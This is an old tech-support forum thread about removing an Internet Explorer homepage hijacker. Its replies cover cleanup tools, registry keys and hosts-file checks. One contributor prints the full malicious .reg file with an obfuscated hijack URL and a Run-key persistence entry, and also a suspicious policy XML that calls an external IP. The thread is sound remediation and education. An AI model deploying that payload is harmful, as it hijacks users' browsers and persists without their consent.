Solved

Unknown virus or malicious file

Posted on 2004-04-27
12
4,270 Views
Last Modified: 2007-12-19
       I have  a serious problem. I believe I've been infected by something  that seems to act like adware, like a virus and a cookie at the same time. It makes my Internet Explorer run unproperly. What it does is that it sets my web homepage as freednshost.info and every time I change it to another webpage as soon as I close the program and open it again its back to freednshost.info. Also every time I click a link on any Internet webpage it will send me to that same page, freednshost.info and I get some sort of search engine with an irritating little stick man dancing up and down on the page. This virus also puts unsolocited Internet Explorer shortcuts on my active desktop and it shows mortgage ads on my options menu in Internet Explorer.
 

I've tried everything. I've scanned my computer. Looked for the infected file manually and I've downloaded the latest virus definitions for my Norton Antivirus but it doesn't seem to help.
 What do I do?
0
Comment
Question by:datinfo
12 Comments
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934730

After installing them, First Update them and then run

Spyware/Adware removal tools:
------------------------------

What is spyware : http://www.spychecker.com/spyware.html

SpyBot-S&D : http://www.safer-networking.org/

Ad-aware : http://www.webattack.com/download/dladaware.shtml 

CWShredder: http://www.softpedia.com/public/cat/10/17/10-17-150.shtml

HijackThis : http://www.spychecker.com/program/hijackthis.html 
0
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934732
Check these registry entries

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Bar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
HKCU\Software\Microsoft\Internet Explorer\SearchURL
HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL
HKCU\Software\Microsoft\Internet Explorer\Search\SearchAssistant
HKCU\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Search Bar


and remove  freednshost.info .. before doing that backup your registry
0
 

Author Comment

by:datinfo
ID: 10934758
Thanks! That was really fast! I just posted the question! I honestly didn't expect such a fast answer!
0
Three Reasons Why Backup is Strategic

Backup is strategic to your business because your data is strategic to your business. Without backup, your business will fail. This white paper explains why it is vital for you to design and immediately execute a backup strategy to protect 100 percent of your data.

 
LVL 49

Accepted Solution

by:
sunray_2003 earned 125 total points
ID: 10934761
Also check the host file

Windows 95/98/Me c:\windows\hosts

Windows NT/2000/XP Pro  c:\winnt\system32\drivers\etc\hosts

Windows XP Home c:\windows\system32\drivers\etc\hosts


and make sure only the below is present

localhost  127.0.0.1


0
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10934762
datinfo,
> I honestly didn't expect such a fast answer!

You will be surprised every time you post .. Ofcourse i should be online. LOL !!
0
 
LVL 49

Expert Comment

by:sunray_2003
ID: 10935166
Thanks for the super fast feedback
0
 

Expert Comment

by:knuthf
ID: 10982115
Whoops,
You forgot the most important key of the all: The "RUN" keys.
(RUN/RUNONCE). - In particular:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run
If this has a value e.g.
            sys    REG_SZ  "regedit -s sys.reg"
Delete this - and any other line that does not belong to anything you want to start.
Search the %WINDIR% directory for files recently updated- same with e.g. WINNT\system32. The last files updated should only be the Perfomance log files.

Your "sys.reg" is downloaded from a site that I am trying to find - the problem is that it first installs itself as a IE "Cookie" in the temporary Internet files - and then after a while it is move. I had the following installed on February 26 - to wake up on April 17 at 19:40 - and slip through all virus scanners:

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"PrivacyAdvanced"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"sys"="regedit -s sys.reg"

----------------
That is one. The other is
<?xml version="1.0"?>
<securitypolicy version="1">
      <fwdebuglog debugflags="0x00000000" maxdebuglog="0"/>
      <lockupinfo server="208.185.174.60" port="0" enable="true"/>
      <startuphookafd wsockvermajor="0x00050000" wsockverminor="0x089319cb" enable="true"/>
                  <processes>
            <process name="fssm32.exe" openprocessaction="allow">
                  <md5table>
                        <md5hex>91feb4e9-8cf1e8e5-4f6f306a-e1399374</md5hex>
                        <md5hex>2f856f29-4d155a8c-c4ebb124-3bfeb9d4</md5hex>
                        <md5hex>6ea475f6-d34c3c6d-7a8a6845-a525d6e6</md5hex>
                  </md5table>
            </process>
      </processes>
</securitypolicy>
...
- but where the ip address is a dead give-away: here ZoneLabs to fetch an executable.
Use Security Policy to avoid change of the RUN keys - some tools like PortPro will guard the keys and notify before they are changed. The WEB pages are malicious - and most believe that virus spread with mail attachment.

I have in another response recommended that all file names in "system32" be changed with e.g. 1st and 4th letter uppercase - rest lowercase. You make some convention that allows you to see in Taskman when an intrusion has been made - e.g. the fssm32.exe above would not be FssM32.exe - so KILL IT.

Make your own search page - distribute this - or force everyone to Google - then "Brand" IE - that inhibits all users to change searchpage, homepage and security settings.
0
 

Expert Comment

by:knuthf
ID: 10982130
I know I posted a virus.
But I believe in educating by real examples, not just mumble jumble talking.
Please beware - it is a virus that will set IE to search somewhere else.
0
 

Expert Comment

by:knuthf
ID: 10982160
IP address resolution:
See http://www.geektools.com/whois.php

It is good because it links in with the regional whois databases.

Another tool is the ID server found at www.grc.com - Steve Gibson's page.
0
 

Expert Comment

by:mormanb
ID: 11136352
i am not able to delete the vsconfig.xml . It says process is being used by another process.   I restored my registry, how can i get rid of this vsconfig.xml ?
0
 

Expert Comment

by:knuthf
ID: 11163949
Rename to e.g. vsconfig.xml.vir - designate open/edit of .vir to Notepad.

Delete *.vir next time you have rebooted the system.

This also allows you to rename files that you do not trust - and inhibit these from being loaded at boot-up. You can now inspect with suited tools - and if the file is e.g. part of MS administrative tools, then you just rename the file - back to vsconfig.xml...
0
 

Expert Comment

by:knuthf
ID: 11163974
Identify the files you have verified with a combination of uppercase/lowercase names.
E.g. to VscOnfig.xml - described in another posting - here first and fourth char in upper case.
0

Featured Post

Use Case: Protecting a Hybrid Cloud Infrastructure

Microsoft Azure is rapidly becoming the norm in dynamic IT environments. This document describes the challenges that organizations face when protecting data in a hybrid cloud IT environment and presents a use case to demonstrate how Acronis Backup protects all data.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
creating custom .audit file with Nessus Tenable 3 115
SQL won't work after disabling SSL3 / TLS1 3 49
md5 password 3 64
Non admin needs to install programs 17 39
If you thought ransomware was bad, think again! Doxware has the potential to be even more damaging.
Each year, investment in cloud platforms grows more than 20% (https://www.immun.io/hubfs/Immunio_2016/Content/Marketing/Cloud-Security-Report-2016.pdf?submissionGuid=a8d80a00-6fee-4b85-81db-a4e28f681762) as an increasing number of companies begin to…
Email security requires an ever evolving service that stays up to date with counter-evolving threats. The Email Laundry perform Research and Development to ensure their email security service evolves faster than cyber criminals. We apply our Threat…
Nobody understands Phishing better than an anti-spam company. That’s why we are providing Phishing Awareness Training to our customers. According to a report by Verizon, only 3% of targeted users report malicious emails to management. With compan…

831 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question